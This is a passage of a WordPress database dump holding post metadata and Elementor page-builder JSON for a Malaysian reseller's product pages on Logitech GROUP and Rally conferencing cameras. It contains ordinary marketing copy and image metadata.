:\"file\";s:33:\"conferencecam-group-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"conferencecam-group-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"conferencecam-group-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5267,2902,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.81007711154869443959114505560137331485748291015625;s:5:\"bytes\";i:3200;s:11:\"size_before\";i:66527;s:10:\"size_after\";i:63327;s:4:\"time\";d:0.060000000000000004718447854656915296800434589385986328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.640000000000000124344978758017532527446746826171875;s:5:\"bytes\";i:142;s:11:\"size_before\";i:3903;s:10:\"size_after\";i:3761;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.930000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:174;s:11:\"size_before\";i:5938;s:10:\"size_after\";i:5764;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.94000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:1295;s:11:\"size_before\";i:21793;s:10:\"size_after\";i:20498;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:181;s:11:\"size_before\";i:5499;s:10:\"size_after\";i:5318;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.720000000000000195399252334027551114559173583984375;s:5:\"bytes\";i:433;s:11:\"size_before\";i:11629;s:10:\"size_after\";i:11196;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:975;s:11:\"size_before\";i:17765;s:10:\"size_after\";i:16790;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5269,2903,'_wp_page_template','template-fullwidth.php'),(5270,2903,'_elementor_edit_mode','builder'),(5271,2903,'_elementor_template_type','post'),(5272,2903,'_elementor_data','[{\"id\":\"d56b4cd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a471602\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"455bf20\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Affordable video conferencing for mid to large-sized meeting rooms<\\/p><ul><li>See every detail with HD video and 10x zoom<\\/li><li>Works with your meeting and video conferencing applications<\\/li><li>Crystal-clear audio for up to 20 participants<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1b32e49\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"06b0dd9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0cf1dd7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef73f1a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"da02547\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fada155\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5d35ea7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"343b905\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/vOMW9wEaoqo\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"0cdde62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"09a199f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR LARGER ROOMS<\\/h3><p>GROUP, our video conferencing solution for rooms that seat 14\\u201320 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, it\\u2019s easier than ever to include everyone in the conversation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad5cd3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3f81ce3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6cdee74\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PLUG-AND-PLAY SIMPLICITY<\\/h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and you\\u2019re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with Bluetooth\\u00ae wireless technology to the GROUP speakerphone.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"664604d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b7f779\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group.jpg\",\"id\":2900}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"696dda5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"002c882\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0be4251\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-1.jpg\",\"id\":2901}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"428141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"eba90b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HIGH-DEFINITION VIDEO<\\/h3><p>Bring meetings into focus with GROUP\\u2019s premium lens, 10x lossless zoom, and HD 1080p\\/30 performance. Perfectly frame presenters and whiteboards with pan\\/tilt control, and zoom in for detail and clarity. GROUP\\u2019s 90\\u00b0 field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9676476\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8f5bcba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"174c105\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>NATURAL-SOUNDING AUDIO<\\/h3><p>Everyone hears and can be heard with GROUP\\u2019s full-duplex speakerphone, which delivers sound that\\u2019s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afc26c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f9d268f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/conferencecam-group-2.jpg\",\"id\":2902}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b8c4f13\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"83ae89b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"32fffa1\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99a4e2b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"5968086\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"51b43f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SPEAKERPHONE WITH BLUETOOTH<\\/h4><p>Hear and be heard with life-like clarity. GROUP\\u2019s full-duplex speakerphone provides 360\\u00b0 coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m \\/ 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5b98fa4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c3150a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31efa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d36663\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT CONTROLS<\\/h4><p>GROUP\\u2019s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f572933\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c52992d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>AVAILABLE EXPANSION MICS<\\/h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyone\\u2019s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"616c1d1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cea2e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c9754e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MUTE WITH CONFIDENCE<\\/h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUP\\u2019s LED status ring lights up red, a subtle yet obvious assurance that\\u2019s easily seen throughout the room.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"542032b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ed52df\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CABLING MADE EASY<\\/h4><p>GROUP\\u2019s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m \\/ 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4ae168e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2371100\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FIELD UPGRADEABLE<\\/h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. It\\u2019s another reason why Logitech delivers the best value proposition in the industry.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1f3494\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"99173ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f1cfa7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5274,2000,'_elementor_version','0.4'),(6295,3066,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(5277,2904,'_wp_page_template','template-fullwidth.php'),(5278,2904,'_elementor_edit_mode','builder'),(5279,2904,'_elementor_template_type','post'),(5280,2904,'_elementor_data','[{\"id\":\"86de509\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33f9f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e581d05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Rally Camera<\\/h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Advanced optics frame every participant with amazing clarity<\\/li><li>Sleek industrial design for any professional meeting space<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fe7a801\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c89bc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa2dfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f116c41\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9992432\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Peerless Performance. Exceptional Versatility.<\\/h3><p><br \\/>With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from Logitech\\u00ae. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan\\/Tilt\\/Zoom, razor-sharp 15X HD zoom, expansive 90\\u00b0 field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c4ca731\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aaa3964\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fe25005\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/TWRoAslIm0c\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"e7053cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1508e06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally Camera delivers brilliantly sharp video, outstanding colour, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122 technology optimises light balance to emphasise faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6fc3397\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"314e459\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a243665\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Rally Camera incorporates world-class Logitech optics and 4K sensor in a premium industrial design suitable for any professional setting. Elegantly finished in matte black with slate gray metal trim, Rally Camera can be positioned on a table, mounted on a tripod, or secured to a wall with included hardware. For overhead installations, the camera detects when it\\u2019s inverted and automatically corrects image orientation and camera controls.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e2af137\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca82ea0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera.jpg\",\"id\":2892}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f080e0a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c69b5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3ecdf9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EVERYONE, PERFECTLY FRAMED<\\/h3><p>Logitech RightSight\\u2122 camera control automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.<\\/p><p>Future Availability: RightSight will be enabled by a software download, with initial support for Windows 10.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c822b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d1e8d28\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b74d921\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/-xGIqpPOyXs\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"240e7e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2001884\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of proactive technologies built into Rally Camera that automate a better user experience. RightSight\\u2122 automates camera control to perfectly frame participants, no matter their distance from the lens. RightLight\\u2122 optimises light balance and prioritises faces over objects and surfaces to render natural-looking skin tones. Plus, Rally Camera is compatible with virtually any video conferencing app right out of the box.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b84fa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5460384\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"975ce9d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PRIVACY ASSURANCE<\\/h3><p>When Rally Camera is not in use, the lens defaults to a parked position where the lens is pointed straight down. This provides visual affirmation that the camera is unable to \\u201csee\\u201d anything in the meeting space when idle. The lens lifts to a preset position when joining a meeting and parks automatically when the meeting ends. In addition, whenever video is muted during a meeting, a status light illuminates red to affirm visual privacy.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c7d6951\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2ab0660\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-camera-1.jpg\",\"id\":2894}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"450ebf7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a7d076b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f621f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5281,2904,'_elementor_version','0.4'),(6294,3066,'_elementor_template_type','post'),(5288,2906,'_edit_lock','1551682871:1'),(5289,2906,'_edit_last','1'),(5290,2906,'_elementor_edit_mode','builder'),(5291,2906,'_elementor_template_type','post'),(5292,2906,'_wp_page_template','template-fullwidth.php'),(5293,2906,'_hide_page_title',''),(5294,2906,'_hide_header',''),(5295,2906,'_hide_footer',''),(5296,2906,'_hide_breadcrumb',''),(5297,2906,'_cover',''),(5298,2906,'_show_excerpt',''),(5299,2906,'_wc_apply_product',''),(5300,2906,'_yoast_wpseo_content_score','30'),(5301,2907,'_elementor_edit_mode','builder'),(5302,2907,'_elementor_template_type','post'),(5303,2907,'_wp_page_template','template-fullwidth.php'),(5343,2906,'_elementor_data','[{\"id\":\"008e84f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"21f0da0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"34477cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>RALLY<\\/h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Modular audio for full coverage of medium to very large rooms<\\/li><li>Premium components and sleek industrial design<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5bb4207\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b5262b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9021bd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d99b4d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21995c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL TOGETHER NOW<\\/h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSense\\u2122 automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft Skype\\u00ae for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0aee94\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"218bc5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"434bad8\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0624977\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cb4a385\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d24280\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/uwx62jjxOnE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"742163f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b70394f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit 